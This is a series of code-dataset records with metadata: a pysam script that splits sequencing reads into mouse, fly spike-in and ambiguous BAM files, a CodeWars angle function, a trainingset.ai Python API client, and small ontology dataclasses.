79487","211000022279488","211000022279490","211000022279493","211000022279498","211000022279503","211000022279506","211000022279507","211000022279508","211000022279509","211000022279510","211000022279513","211000022279516","211000022279523","211000022279526","211000022279527","211000022279533","211000022279549","211000022279551","211000022279554","211000022279556","211000022279559","211000022279562","211000022279564","211000022279569","211000022279572","211000022279573","211000022279574","211000022279580","211000022279584","211000022279590","211000022279591","211000022279592","211000022279593","211000022279599","211000022279603","211000022279606","211000022279609","211000022279612","211000022279615","211000022279618","211000022279619","211000022279622","211000022279623","211000022279624","211000022279626","211000022279627","211000022279628","211000022279631","211000022279632","211000022279633","211000022279635","211000022279637","211000022279641","211000022279644","211000022279648","211000022279651","211000022279652","211000022279653","211000022279654","211000022279655","211000022279656","211000022279657","211000022279659","211000022279660","211000022279663","211000022279664","211000022279666","211000022279668","211000022279671","211000022279672","211000022279675","211000022279682","211000022279684","211000022279685","211000022279696","211000022279710","211000022279712","211000022279722","211000022279723","211000022279724","211000022279726","211000022279727","211000022279728","211000022279729","211000022279733","211000022279736","211000022279737","211000022279738","211000022279740","211000022279741","211000022279742","211000022279747","211000022279748","211000022279749","211000022279750","211000022279754","211000022279756","211000022279758","211000022279761","211000022279769","211000022279770","211000022279771","211000022279777","211000022279778","211000022279780","211000022279781","211000022279782","211000022279784","211000022279785","211000022279787","211000022279788","211000022279789","211000022279792","211000022279793","211000022279804","211000022279805","211000022279807","211000022279809","211000022279811","211000022279812","211000022279814","211000022279819","211000022279820","211000022279824","211000022279829","211000022279837","211000022279839","211000022279842","211000022279844","211000022279845","211000022279851","211000022279853","211000022279855","211000022279856","211000022279867","211000022279871","211000022279874","211000022279875","211000022279877","211000022279879","211000022279880","211000022279884","211000022279885","211000022279887","211000022279889","211000022279890","211000022279892","211000022279893","211000022279896","211000022279899","211000022279900","211000022279904","211000022279906","211000022279909","211000022279911","211000022279913","211000022279921","211000022279923","211000022279926","211000022279927","211000022279928","211000022279929","211000022279931","211000022279933","211000022279934","211000022279940","211000022279942","211000022279943","211000022279946","211000022279949","211000022279952","211000022279954","211000022279956","211000022279959","211000022279960","211000022279961","211000022279966","211000022279969","211000022279970","211000022279971","211000022279973","211000022279979","211000022279980","211000022279982","211000022279985","211000022279987","211000022279990","211000022280000","211000022280002","211000022280009","211000022280010","211000022280011","211000022280012","211000022280014","211000022280018","211000022280020","211000022280025","211000022280026","211000022280028","211000022280030","211000022280031","211000022280032","211000022280033","211000022280035","211000022280043","211000022280045","211000022280050","211000022280053","211000022280054","211000022280056","211000022280064","211000022280065","211000022280068","211000022280069","211000022280071","211000022280074","211000022280075","211000022280076","211000022280079","211000022280083","211000022280084","211000022280085","211000022280086","211000022280089","211000022280097","211000022280102","211000022280106","211000022280108","211000022280110","211000022280112","211000022280114","211000022280115","211000022280117","211000022280120","211000022280121","211000022280123","211000022280124","211000022280130","211000022280133","211000022280135","211000022280139","211000022280140","211000022280141","211000022280143","211000022280144","211000022280150","211000022280151","211000022280152","211000022280153","211000022280154","211000022280156","211000022280159","211000022280160","211000022280161","211000022280162","211000022280164","211000022280165","211000022280168","211000022280174","211000022280176","211000022280177","211000022280178","211000022280179","211000022280180","211000022280181","211000022280183","211000022280191","211000022280192","211000022280193","211000022280194","211000022280195","211000022280196","211000022280198","211000022280205","211000022280206","211000022280208","211000022280210","211000022280211","211000022280212","211000022280218","211000022280220","211000022280221","211000022280223","211000022280224","211000022280225","211000022280226","211000022280228","211000022280230","211000022280232","211000022280233","211000022280235","211000022280236","211000022280237","211000022280240","211000022280247","211000022280255","211000022280256","211000022280257","211000022280259","211000022280260","211000022280261","211000022280262","211000022280266","211000022280268","211000022280269","211000022280272","211000022280283","211000022280289","211000022280290","211000022280291","211000022280292","211000022280293","211000022280294","211000022280295","211000022280296","211000022280297","211000022280298","211000022280301","211000022280302","211000022280303","211000022280304","211000022280305","211000022280308","211000022280311","211000022280312","211000022280315","211000022280316","211000022280318","211000022280319","211000022280320","211000022280322","211000022280325","211000022280326","211000022280327","211000022280331","211000022280333","211000022280335","211000022280336","211000022280338","211000022280340","211000022280341","211000022280343","211000022280344","211000022280345","211000022280346","211000022280347","211000022280350","211000022280427","211000022280437","211000022280440","211000022280443","211000022280445","211000022280447","211000022280448","211000022280455","211000022280456","211000022280457","211000022280459","211000022280461","211000022280463","211000022280465","211000022280469","211000022280471","211000022280472","211000022280474","211000022280476","211000022280480","211000022280485","211000022280497","211000022280501","211000022280511","211000022280516","211000022280518","211000022280519","211000022280522","211000022280525","211000022280535","211000022280536","211000022280541","211000022280544","211000022280545","211000022280548","211000022280553","211000022280554","211000022280555","211000022280556","211000022280557","211000022280558","211000022280561","211000022280562","211000022280565","211000022280566","211000022280568","211000022280570","211000022280588","211000022280595","211000022280598","211000022280599","211000022280605","211000022280606","211000022280607","211000022280610","211000022280615","211000022280617","211000022280618","211000022280623","211000022280631","211000022280637","211000022280640","211000022280644","211000022280656","211000022280671","211000022280676","211000022280678","211000022280679","211000022280681","211000022280684","211000022280685","211000022280687","211000022280689","211000022280691","211000022280692","211000022280694","211000022280696","211000022280698","211000022280699","211000022280700","211000022280702","211000022280703","211000022280704","211000022280706","211000022280707","211000022280720","211000022280727","211000022280734","211000022280735","211000022280743","211000022280747","211000022280750","211000022280762","XY_mapped_Scaffold_7_D1574","211000022278161","211000022278241","211000022278242","211000022278298","211000022278307","211000022278309","211000022278338","211000022278339","211000022278408","211000022278453","211000022278501","211000022278522","211000022278554","211000022278603","211000022278660","211000022278663","211000022278664","211000022278866","211000022278869","211000022278874","211000022278877","211000022278878","211000022278881","211000022278886","211000022278897","211000022278920","211000022278942","211000022278951","211000022278975","211000022278985","211000022279055","211000022279101","211000022279103","211000022279106","211000022279122","211000022279134","211000022279190","211000022279204","211000022279222","211000022279271","211000022279286","211000022279342","211000022279399","211000022279529","211000022279555","211000022279571","211000022279600","211000022279602","211000022279667","211000022279701","211000022279708","211000022279810","211000022279945","211000022279965","211000022279975","211000022279991","211000022280091","211000022280142","211000022280436","211000022280467","211000022280492","211000022280500","211000022280517","211000022280580","211000022278099","211000022278122","211000022278125","211000022278165","211000022278172","211000022278187","211000022278208","211000022278209","211000022278225","211000022278226","211000022278227","211000022278228","211000022278229","211000022278230","211000022278231","211000022278232","211000022278233","211000022278235","211000022278236","211000022278237","211000022278249","211000022278252","211000022278268","211000022278277","211000022278297","211000022278299","211000022278314","211000022278315","211000022278316","211000022278317","211000022278318","211000022278319","211000022278320","211000022278321","211000022278322","211000022278323","211000022278324","211000022278325","211000022278326","211000022278340","211000022278341","211000022278342","211000022278343","211000022278346","211000022278350","211000022278352","211000022278353","211000022278355","211000022278359","211000022278360","211000022278361","211000022278365","211000022278382","211000022278411","211000022278414","211000022278417","211000022278431","211000022278458","211000022278459","211000022278460","211000022278461","211000022278462","211000022278463","211000022278464","211000022278465","211000022278466","211000022278467","211000022278468","211000022278469","211000022278470","211000022278471","211000022278472","211000022278473","211000022278474","211000022278475","211000022278476","211000022278477","211000022278478","211000022278479","211000022278480","211000022278481","211000022278482","211000022278483","211000022278484","211000022278485","211000022278486","211000022278487","211000022278488","211000022278489","211000022278490","211000022278491","211000022278492","211000022278498","211000022278502","211000022278504","211000022278505","211000022278512","211000022278513","211000022278516","211000022278524","211000022278534","211000022278544","211000022278555","211000022278557","211000022278578","211000022278584","211000022278596","211000022278607","211000022278608","211000022278609","211000022278610","211000022278612","211000022278613","211000022278614","211000022278615","211000022278616","211000022278617","211000022278618","211000022278619","211000022278620","211000022278621","211000022278622","211000022278623","211000022278624","211000022278625","211000022278626","211000022278627","211000022278628","211000022278629","211000022278630","211000022278631","211000022278632","211000022278633","211000022278634","211000022278635","211000022278636","211000022278637","211000022278638","211000022278639","211000022278640","211000022278643","211000022278644","211000022278645","211000022278646","211000022278647","211000022278648","211000022278649","211000022278654","211000022278655","211000022278669","211000022278670","211000022278671","211000022278677","211000022278690","211000022278691","211000022278692","211000022278693","211000022278694","211000022278695","211000022278704","211000022278705","211000022278715","211000022278724","211000022278725","211000022278726","211000022278774","211000022278775","211000022278810","211000022278811","211000022278812","211000022278813","211000022278814","211000022278815","211000022278816","211000022278817","211000022278818","211000022278819","211000022278820","211000022278821","211000022278822","211000022278823","211000022278824","211000022278825","211000022278826","211000022278827","211000022278828","211000022278829","211000022278830","211000022278831","211000022278832","211000022278833","211000022278834","211000022278835","211000022278836","211000022278837","211000022278838","211000022278839","211000022278840","211000022278841","211000022278842","211000022278843","211000022278844","211000022278845","211000022278846","211000022278850","211000022278851","211000022278852","211000022278853","211000022278854","211000022278855","211000022278856","211000022278857","211000022278861","211000022278868","211000022278876","211000022278879","211000022278880","211000022278882","211000022278892","211000022278896","211000022278905","211000022278906","211000022278907","211000022278908","211000022278909","211000022278910","211000022278911","211000022278921","211000022278925","211000022278933","211000022278938","211000022278950","211000022278971","211000022278976","211000022279006","211000022279008","211000022279009","211000022279010","211000022279012","211000022279045","211000022279062","211000022279063","211000022279064","211000022279065","211000022279066","211000022279067","211000022279068","211000022279071","211000022279072","211000022279073","211000022279074","211000022279075","211000022279076","211000022279077","211000022279078","211000022279079","211000022279080","211000022279081","211000022279082","211000022279083","211000022279084","211000022279085","211000022279086","211000022279092","211000022279093","211000022279108","211000022279109","211000022279111","211000022279112","211000022279113","211000022279188","211000022279227","211000022279244","211000022279245","211000022279277","211000022279287","211000022279290","211000022279291","211000022279295","211000022279296","211000022279297","211000022279298","211000022279299","211000022279300","211000022279301","211000022279302","211000022279303","211000022279304","211000022279305","211000022279306","211000022279307","211000022279315","211000022279316","211000022279322","211000022279327","211000022279328","211000022279332","211000022279339","211000022279340","211000022279388","211000022279408","211000022279437","211000022279438","211000022279446","211000022279460","211000022279467","211000022279497","211000022279499","211000022279501","211000022279502","211000022279504","211000022279505","211000022279514","211000022279515","211000022279518","211000022279528","211000022279530","211000022279531","211000022279536","211000022279537","211000022279542","211000022279543","211000022279552","211000022279553","211000022279563","211000022279570","211000022279601","211000022279604","211000022279605","211000022279608","211000022279610","211000022279673","211000022279674","211000022279676","211000022279686","211000022279689","211000022279690","211000022279698","211000022279703","211000022279704","211000022279705","211000022279715","211000022279720","211000022279721","211000022279730","211000022279731","211000022279732","211000022279764","211000022279767","211000022279772","211000022279773","211000022279774","211000022279803","211000022279830","211000022279832","211000022279833","211000022279834","211000022279836","211000022279846","211000022279857","211000022279859","211000022279860","211000022279861","211000022279862","211000022279881","211000022279882","211000022279883","211000022279888","211000022279902","211000022279917","211000022279944","211000022279955","211000022279957","211000022279967","211000022279968","211000022279978","211000022279984","211000022279994","211000022279998","211000022280007","211000022280016","211000022280017","211000022280019","211000022280022","211000022280023","211000022280029","211000022280034","211000022280042","211000022280060","211000022280061","211000022280062","211000022280077","211000022280088","211000022280095","211000022280125","211000022280148","211000022280173","211000022280241","211000022280243","211000022280270","211000022280330","211000022280439","211000022280442","211000022280453","211000022280466","211000022280470","211000022280479","211000022280495","211000022280507","211000022280526","211000022280529","211000022280532","211000022280534","211000022280537","211000022280538","211000022280539","211000022280542","211000022280578","211000022280584","211000022280585","211000022280586","211000022280587","211000022280592","211000022280593","211000022280594","211000022280597","211000022280603","211000022280612","211000022280620","211000022280622","211000022280624","211000022280625","211000022280628","211000022280629","211000022280632","211000022280633","211000022280639","211000022280641","211000022280642","211000022280645","211000022280649","211000022280657","211000022280668","211000022280669","211000022278135","211000022278142","211000022278153","211000022278201","211000022278214","211000022278218","211000022278278","211000022278405","211000022278418","211000022278436","211000022278449","211000022278450","211000022278495","211000022278499","211000022278509","211000022278510","211000022278538","211000022278565","211000022278577","211000022278586","211000022278601","211000022278682","211000022278683","211000022278684","211000022278709","211000022278710","211000022278722","211000022278734","211000022278736","211000022278743","211000022278756","211000022278760","211000022278772","211000022278787","211000022278791","211000022278795","211000022278798","211000022278802","211000022278803","211000022278872","211000022278873","211000022278895","211000022278935","211000022278936","211000022278939","211000022278941","211000022278956","211000022278959","211000022278965","211000022278984","211000022278987","211000022278990","211000022278995","211000022278997","211000022279005","211000022279007","211000022279025","211000022279026","211000022279030","211000022279031","211000022279034","211000022279046","211000022279047","211000022279090","211000022279104","211000022279123","211000022279137","211000022279153","211000022279164","211000022279165","211000022279174","211000022279181","211000022279186","211000022279211","211000022279224","211000022279235","211000022279236","211000022279261","211000022279264","211000022279266","211000022279268","211000022279269","211000022279272","211000022279279","211000022279280","211000022279314","211000022279319","211000022279333","211000022279334","211000022279335","211000022279352","211000022279377","211000022279382","211000022279385","211000022279391","211000022279392","211000022279403","211000022279404","211000022279410","211000022279452","211000022279458","211000022279459","211000022279468","211000022279484","211000022279485","211000022279486","211000022279491","211000022279492","211000022279494","211000022279496","211000022279511","211000022279532","211000022279546","211000022279550","211000022279560","211000022279582","211000022279583","211000022279586","211000022279589","211000022279639","211000022279642","211000022279646","211000022279649","211000022279661","211000022279669","211000022279670","211000022279677","211000022279678","211000022279679","211000022279680","211000022279681","211000022279688","211000022279709","211000022279725","211000022279755","211000022279791","211000022279795","211000022279799","211000022279800","211000022279801","211000022279802","211000022279813","211000022279831","211000022279835","211000022279870","211000022279876","211000022279901","211000022279907","211000022279908","211000022279910","211000022279918","211000022279932","211000022279935","211000022279936","211000022279937","211000022279938","211000022279941","211000022279950","211000022279951","211000022279963","211000022279972","211000022279974","211000022279986","211000022279988","211000022279989","211000022279995","211000022279999","211000022280024","211000022280040","211000022280044","211000022280057","211000022280072","211000022280090","211000022280116","211000022280138","211000022280157","211000022280187","211000022280481","211000022280483","211000022280494","211000022280504","211000022280619","211000022280686","211000022280742","211000022280748","211000022280763"]
##########
# Categorize read names
##########
mouse = set()
fly = set()
both = set()
inSam = pysam.AlignmentFile(args.allSamFile, "rb")
# Multiple alignments of a read are reported individually.
for read in inSam:
if not read.is_unmapped:
if read.reference_name in spikeChroms:
# Mapped to spike-in reference (fly).
fly.add(read.query_name)
else:
# Mapped to reference of interest (mouse).
mouse.add(read.query_name)
inSam.close()
# Distinguish multimappers.
both = mouse & fly # It's mapped to both mouse and fly
mouse = mouse - both # Only to mouse
fly = fly - both # Only to fly
##########
# Categorize reads
##########
prefix = re.sub(".sam|.bam", "", os.path.basename(args.allSamFile))
prefix = re.sub(".deduped|.aln", "", prefix)
# Re-open input from the start.
inSam = pysam.AlignmentFile(args.allSamFile, "rb")
# Mapped only to target locus.
outMouse = pysam.AlignmentFile(os.path.join(args.outDir, prefix + "_subject.bam"), "wb", template=inSam)
# Mapped to target locus but equally well mapped to native IgH region.
outFly = pysam.AlignmentFile(os.path.join(args.outDir, prefix + "_spikein.bam"), "wb", template=inSam)
# Unique and non-unique mapped to locus (ie. the above two together).
outBoth = pysam.AlignmentFile(os.path.join(args.outDir, prefix + "_ambiguous.bam"), "wb", template=inSam)
for read in inSam:
# Discard unmapped reads.
if not read.is_unmapped:
if read.query_name in mouse:
outMouse.write(read)
elif read.query_name in fly:
outFly.write(read)
elif read.query_name in both:
outBoth.write(read)
inSam.close()
outMouse.close()
outFly.close()
outBoth.close()
| 386.21875 | 32,697 | 0.821884 | 2,422 | 37,077 | 12.50289 | 0.864575 | 0.011558 | 0.005944 | 0.002378 | 0.010435 | 0.010435 | 0.007859 | 0.004359 | 0 | 0 | 0 | 0.754298 | 0.014807 | 37,077 | 95 | 32,698 | 390.284211 | 0.07471 | 0.02538 | 0 | 0.177778 | 0 | 0 | 0.799472 | 0.036225 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2d0e785722a643a0751d95a2dc1fc6715ab01384 | 35 | py | Python | CodeWars/Python/030-Sum_of_angles.py | IsFilimonov/Interviews | 261b59cd80e1451804c37b03b4cce7c1b63f609d | [
"MIT"
] | 2 | 2021-05-09T22:39:49.000Z | 2021-09-16T12:44:09.000Z | CodeWars/Python/030-Sum_of_angles.py | IsFilimonov/Interviews | 261b59cd80e1451804c37b03b4cce7c1b63f609d | [
"MIT"
] | null | null | null | CodeWars/Python/030-Sum_of_angles.py | IsFilimonov/Interviews | 261b59cd80e1451804c37b03b4cce7c1b63f609d | [
"MIT"
] | null | null | null | def angle(n):
return (n-2)*180
| 11.666667 | 20 | 0.571429 | 7 | 35 | 2.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 0.228571 | 35 | 2 | 21 | 17.5 | 0.592593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
7487994641381887e98fd23f0957f62499e652eb | 11,298 | py | Python | trainingsetai/__init__.py | trainingset-ai/trainingsetai-python-sdk | b5c412044cc649f0527a9ae82e0641132d901b04 | [
"MIT"
] | 1 | 2021-01-19T08:22:56.000Z | 2021-01-19T08:22:56.000Z | trainingsetai/__init__.py | trainingset-ai/trainingsetai-python-sdk | b5c412044cc649f0527a9ae82e0641132d901b04 | [
"MIT"
] | null | null | null | trainingsetai/__init__.py | trainingset-ai/trainingsetai-python-sdk | b5c412044cc649f0527a9ae82e0641132d901b04 | [
"MIT"
] | null | null | null | import requests
BASE_URL = "https://api.trainingset.ai/api"
class TrainingsetException(Exception):
def __init__(self, message, status_code):
super(TrainingsetException, self).__init__(
'<Response [{}]> {}'.format(status_code, message))
self.code = status_code
class TrainingsetInvalidRequest(TrainingsetException, ValueError):
pass
class TrainingsetClient:
def __init__(self, api_key):
self.session = requests.Session()
self.session.headers.update({'user_key': api_key})
def _get_request(self, endpoint, params={}):
r = self.session.get(BASE_URL + endpoint, params=params)
if r.status_code == 200:
return r.json()
else:
try:
error = r.json()
except ValueError:
error = r.text
if r.status_code == 400:
raise TrainingsetInvalidRequest(
error["message"], r.status_code)
else:
raise TrainingsetException(error, r.status_code)
def _post_request(self, endpoint, data):
r = self.session.post(BASE_URL + endpoint, json=data)
if r.status_code == 200:
return r.json()
else:
try:
error = r.json()
except ValueError:
error = r.text
if r.status_code == 400:
raise TrainingsetInvalidRequest(
error["message"], r.status_code)
else:
raise TrainingsetException(error, r.status_code)
def get_tasks(self, parameters={}):
"""
Returns a list of tasks.
parameters object:
`sort`: [["attribute_name",1 or -1]], example: [["_id",1]], 1 is ascending, -1 is descending
`rangeStart`: YYYY-MM-DD, example: "2020-01-31"
`rangeEnd`: YYYY-MM-DD, example: "2020-12-31"
`type`: "annotation-box" | "annotation-line" | "annotation-polygon" | "annotation-box" | "annotation-pcd" | "categorization-image" | "segmentation"
`status`: "pending" | "completed" | "cancelled" | "error" | "ready" | "working"
`project`: string, projectID, example: "5f6359d0838a1d868f54cac4"
`limit`: integer
`skip`: integer
`id`: string, ID of the task
`qa_status`: "accepted" | "pending" | "rejected"
Check the documentation for more info:
https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
"""
return self._get_request("/task/by-custom-filter", parameters)
def delete_task(self, task_id):
"""
Deletes a task.
"""
response = self.session.delete(BASE_URL + "/task/" + task_id)
return response.json()
def create_box_annotation_task(self, task):
"""
Creates a box type annotation task.
task object:
`instructions`: Instructions for drawing the task (Required) (String)
`attachment_url`: HTTP/HTTPS Image address where the drawing of the task is carried out (Required) (String)
`min_height`: Minimum height of each box drawn in the task (Optional) (Number)
`min_width`: Minimum width of each box drawn in the task (Optional) (Number)
`with_labels`: Define if the task has tags (Optional) (Boolean)
`objects_to_annotate`: List of objects to be annotated (Optional) (AnnotationObject Array)
`project`: Name of the project that belongs to the task (Optional) (String)
`callback_url`: URL to which you will get task results delivered (Optional) (String)
`automatic_prelabel`: Automatically prelabel the picture (Optional) (Boolean)
Check the documentation for more info:
https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
"""
return self._post_request("/task/annotation/box", task)
def create_line_annotation_task(self, task):
"""
Creates a line type annotation task.
task object:
`instructions`: Instructions for drawing the task (Required) (String)
`attachment_url`: HTTP/HTTPS Image address where the drawing of the task is carried out (Required) (String)
`min_vertices`: Minimum number of vertices that a polygon drawn in the task must have (Optional)(Number)
`max_vertices`: Maximum number of vertices that a polygon drawn in the task must have (Optional)(Number)
`with_labels`: Define if the task has tags (Optional) (Boolean)
`objects_to_annotate`: List of objects to be annotated (Optional) (AnnotationObject Array)
`project`: Name of the project that belongs to the task (Optional) (String)
`callback_url`: URL to which you will get task results delivered (Optional) (String)
`automatic_prelabel`: Automatically prelabel the picture (Optional) (Boolean)
Check the documentation for more info:
https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
"""
return self._post_request("/task/annotation/line", task)
def create_polygon_annotation_task(self, task):
"""
Creates a line type annotation task.
task object:
`instructions`: Instructions for drawing the task (Required) (String)
`attachment_url`: HTTP/HTTPS Image address where the drawing of the task is carried out (Required) (String)
`min_vertices`: Minimum number of vertices that a polygon drawn in the task must have (Optional)(Number)
`max_vertices`: Maximum number of vertices that a polygon drawn in the task must have (Optional)(Number)
`with_labels`: Define if the task has tags (Optional) (Boolean)
`objects_to_annotate`: List of objects to be annotated (Optional) (AnnotationObject Array)
`project`: Name of the project that belongs to the task (Optional) (String)
`callback_url`: URL to which you will get task results delivered (Optional) (String)
`automatic_prelabel`: Automatically prelabel the picture (Optional) (Boolean)
Check the documentation for more info:
https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
"""
return self._post_request("/task/annotation/polygon", task)
def create_point_annotation_task(self, task):
"""
Creates a line type annotation task.
task object:
`instructions`: Instructions for drawing the task (Required) (String)
`attachment_url`: HTTP/HTTPS Image address where the drawing of the task is carried out (Required) (String)
`with_labels`: Define if the task has tags (Optional) (Boolean)
`objects_to_annotate`: List of objects to be annotated (Optional) (AnnotationObject Array)
`project`: Name of the project that belongs to the task (Optional) (String)
`callback_url`: URL to which you will get task results delivered (Optional) (String)
`automatic_prelabel`: Automatically prelabel the picture (Optional) (Boolean)
Check the documentation for more info:
https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
"""
return self._post_request("/task/annotation/point", task)
def create_point_cloud_annotation_task(self, task):
"""
Creates a line type annotation task.
task object:
`instructions`: Instructions for drawing the task (Required) (String)
`attachment_url`: HTTP/HTTPS Image address where the drawing of the task is carried out (Required) (String)
`with_labels`: Define if the task has tags (Optional) (Boolean)
`objects_to_annotate`: List of objects to be annotated (Optional) (AnnotationObject Array)
`project`: Name of the project that belongs to the task (Optional) (String)
`callback_url`: URL to which you will get task results delivered (Optional) (String)
`cameras`: Camera parameters, each camera is an object (Optional) (CameraObject Array)
Check the documentation for more info:
https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
"""
return self._post_request("/task/annotation/pcd", task)
def create_segmentation_task(self, task):
"""
Creates a line type annotation task.
task object:
`instructions`: Instructions for drawing the task (Required) (String)
`attachment_url`: HTTP/HTTPS Image address where the drawing of the task is carried out (Required) (String)
`with_labels`: Define if the task has tags (Optional) (Boolean)
`objects_to_annotate`: List of objects to be annotated (Optional) (AnnotationObject Array)
`project`: Name of the project that belongs to the task (Optional) (String)
`callback_url`: URL to which you will get task results delivered (Optional) (String)
`automatic_prelabel`: Automatically prelabel the picture (Optional) (Boolean)
Check the documentation for more info:
https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
"""
return self._post_request("/task/annotation/segmentation", task)
def create_image_categorization_task(self, task):
"""
Creates a line type annotation task.
task object:
`instructions`: Instructions for drawing the task (Required) (String)
`categories`: Categories into which an image can be categorized (Required) (String Array)
`attachment_url`: HTTP/HTTPS Image address where the drawing of the task is carried out (Required) (String)
`allow_multiple`: Allow multiple categories to be selected (Optional) (Boolean)
`with_labels`: Define if the task has tags (Optional) (Boolean)
`project`: Name of the project that belongs to the task (Optional) (String)
`callback_url`: URL to which you will get task results delivered (Optional) (String)
Check the documentation for more info:
https://documenter.getpostman.com/view/10426338/Szf9V75M?version=latest#783c6a4f-373a-4559-a68a-30cd98808d73
"""
return self._post_request("/task/categorization/image", task)
def create_project(self, project_name, summary, instructions, automatic_prelabel, automatic_label):
"""
Creates a new project.
"""
return self._post_request("/project", {
"name": project_name,
"summary": summary,
"instructions": instructions,
"automatic_prelabel": automatic_prelabel,
"automatic_label": automatic_label,
})
def get_projects(self):
"""
Fetches a list of projects.
"""
return self._get_request("/project")
def delete_project(self, project_id):
"""
Deletes a project by it's identifier.
"""
response = self.session.delete(BASE_URL + "/project/" + project_id)
return response.json()
| 37.287129 | 155 | 0.658789 | 1,328 | 11,298 | 5.498494 | 0.145331 | 0.033552 | 0.018488 | 0.026294 | 0.744864 | 0.73966 | 0.726787 | 0.726787 | 0.726787 | 0.71857 | 0 | 0.037641 | 0.245176 | 11,298 | 302 | 156 | 37.410596 | 0.818598 | 0.614622 | 0 | 0.356164 | 0 | 0 | 0.101337 | 0.042793 | 0 | 0 | 0 | 0 | 0 | 1 | 0.219178 | false | 0.013699 | 0.013699 | 0 | 0.465753 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
77879300dbcba02b4e42942f60db7bbf45785e2e | 590 | py | Python | sm_widgets/models/ontology.py | binh-vu/sm-gui | dd5faa09b7570762aa63bf9f2ff88081cf132db4 | [
"MIT"
] | null | null | null | sm_widgets/models/ontology.py | binh-vu/sm-gui | dd5faa09b7570762aa63bf9f2ff88081cf132db4 | [
"MIT"
] | null | null | null | sm_widgets/models/ontology.py | binh-vu/sm-gui | dd5faa09b7570762aa63bf9f2ff88081cf132db4 | [
"MIT"
] | null | null | null | from dataclasses import dataclass, field
from typing import List, Set, Optional
@dataclass
class OntClass:
uri: str
label: str
aliases: List[str]
description: str
parents: List[str]
parents_closure: Set[str] = field(default_factory=set)
@property
def readable_label(self):
return self.label
@dataclass
class OntProperty:
uri: str
label: str
aliases: List[str]
description: str
parents: List[str]
parents_closure: Set[str] = field(default_factory=set)
@property
def readable_label(self):
return self.label | 19.666667 | 58 | 0.679661 | 73 | 590 | 5.410959 | 0.356164 | 0.070886 | 0.055696 | 0.070886 | 0.713924 | 0.713924 | 0.713924 | 0.713924 | 0.713924 | 0.713924 | 0 | 0 | 0.237288 | 590 | 30 | 59 | 19.666667 | 0.877778 | 0 | 0 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0.083333 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7ae2cf1ccad8cecbf0a0bc8a3d2be40943a04509 | 34 | py | Python | runtest.py | tzakrajs/yaiges | 046e376dc7a03466cf2860cf29509d251ed667e3 | [
"Apache-2.0"
] | null | null | null | runtest.py | tzakrajs/yaiges | 046e376dc7a03466cf2860cf29509d251ed667e3 | [
"Apache-2.0"
] | null | null | null | runtest.py | tzakrajs/yaiges | 046e376dc7a03466cf2860cf29509d251ed667e3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
import asyncio
| 11.333333 | 18 | 0.764706 | 5 | 34 | 5.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0.088235 | 34 | 2 | 19 | 17 | 0.806452 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7aefb3899ee49c492294932181e2bb7dbac73100 | 14,571 | py | Python | tests/syntax/simple_expression/test_assignment_ops.py | PowerOlive/mindspore | bda20724a94113cedd12c3ed9083141012da1f15 | [
"Apache-2.0"
] | 3,200 | 2020-02-17T12:45:41.000Z | 2022-03-31T20:21:16.000Z | tests/syntax/simple_expression/test_assignment_ops.py | zimo-geek/mindspore | 665ec683d4af85c71b2a1f0d6829356f2bc0e1ff | [
"Apache-2.0"
] | 176 | 2020-02-12T02:52:11.000Z | 2022-03-28T22:15:55.000Z | tests/syntax/simple_expression/test_assignment_ops.py | zimo-geek/mindspore | 665ec683d4af85c71b2a1f0d6829356f2bc0e1ff | [
"Apache-2.0"
